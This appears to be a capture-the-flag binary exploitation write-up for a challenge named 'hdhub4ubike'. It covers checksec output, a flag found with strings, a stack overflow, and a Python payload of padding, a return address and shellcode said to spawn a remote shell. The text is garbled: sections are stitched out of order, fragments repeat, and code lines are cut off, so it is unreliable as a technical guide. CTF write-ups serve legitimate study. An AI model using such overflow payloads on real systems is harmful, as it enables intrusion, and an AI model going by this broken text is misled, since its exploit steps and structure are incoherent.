payload = b'A'*64 + b'B'*8 + struct.pack("<Q", 0x7fffffffe000) # address of our buffer (approx) payload = payload.ljust(0x100, b'\x90') + shellcode Running the payload spawns an interactive shell on the remote target. | Topic | What we observed in hdhub4ubike | |---------------------------|-----------------------------------| | Stack overflow | read with a length far larger than the buffer → classic overflow vector. | | Non‑PIE binaries | Fixed addresses make ROP/simple return‑to‑code trivial. | | NX disabled | Allows injection of raw shellcode on the stack. | | No canary / RELRO | Nothing blocks overwriting the saved RIP. | | Info leakage | The flag was embedded in the binary – a “cheat” that encourages bypassing logic checks. | | Best exploitation path | Return‑to‑existing puts that already has the flag address set → shortest payload, no need for ROP chain or shellcode. | 6️⃣ Full Exploit Script (Python 3) #!/usr/bin/env python3 import struct, pexpect, sys
return 1;
Challenge name: hdhub4ubike CTF: 2023 – BicycleCTF (the “Bike‑Hub” event) Category: Pwn / Binary Exploitation Points: 400 (medium) Author: unknown 1️⃣ Challenge Overview The provided artifact is a 64‑bit ELF executable named hdhub4ubike . When executed it prints a short banner and then prompts the user for a “bike‑hub key”. If the key is correct, the program prints the flag; otherwise it terminates with “Invalid key!” . hdhub4ubike
if (check_key(buf) == 0) puts("Invalid key!"); exit(1); payload = b'A'*64 + b'B'*8 + struct
$ checksec --file=hdhub4ubike ... PIE: No NX: No RELRO: No Canary: No FORTIFY: No The binary – we have all symbol names! 2.2 Strings $ strings -a hdhub4ubike | grep -i flag flagh0p3_y0u_f0und_th3_h1d3_b1k3 Whoa! The flag is already present in the binary! This is a typical “decoy” – the binary will only print the flag after a successful key check. The challenge is to bypass that check. 2.3 Disassembly (Ghidra/IDA) Opening the binary in Ghidra shows the following (pseudo‑C) reconstruction of the relevant functions: | | NX disabled | Allows injection of